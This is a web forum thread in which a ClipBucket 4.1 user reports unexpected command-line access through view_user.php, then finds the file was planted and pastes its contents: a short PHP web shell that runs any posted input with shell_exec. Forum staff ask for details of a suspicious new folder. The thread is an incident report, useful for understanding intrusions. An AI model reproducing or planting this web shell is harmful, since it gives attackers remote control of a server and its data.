Serious security issue

[ScaredDonut]

Soo I am using clipbucket 4.1 I was trying to get my "Please select your category" issue fixed during sign up. Accidentally I went to MyDomain.com/view_user.php?uid=1 and I was able to access my servers CLI. Luckily I had my permissions set correctly, but you can do some serious damage with this. I was able to download things, and remove things.

[MacWarrior]

Hi,

This is what I have on https://mydomain.com/view_user.php?uid=1
(With and without SEO URL)

Your result may be a server configuration issue.

[ScaredDonut]

does seem to be on my end, I re-updated my clipbucket and it still happened. It seems like someone accessed my server via alternative means.

because this is my view_user.php:

<form action="" method="post"><input type="text" style="width:200px" name="input"><button type="submit">Exec</button></form>
<pre>
<?php
if (isset($_POST['input'])) echo '$ ' . $_POST['input'] . "\n" . shell_exec($_POST['input']);
?>
</pre>

quick update:

Went through all the folders and I found a new folder as well: "actions/CB_BEATS_UPLOAD_DIR/"

My bad seems like it was on my end. Don't know how they got access, but seems like all they did was my coins. Doesn't seem like there was anything malicious done.

view_user.php is not a file either on the original clipbucket.

[fahad-cb]

Hello @itsflashpoint
can you share the filenames inside the "actions/CB_BEATS_UPLOAD_DIR/" folder ?
and also the create date for the folder and files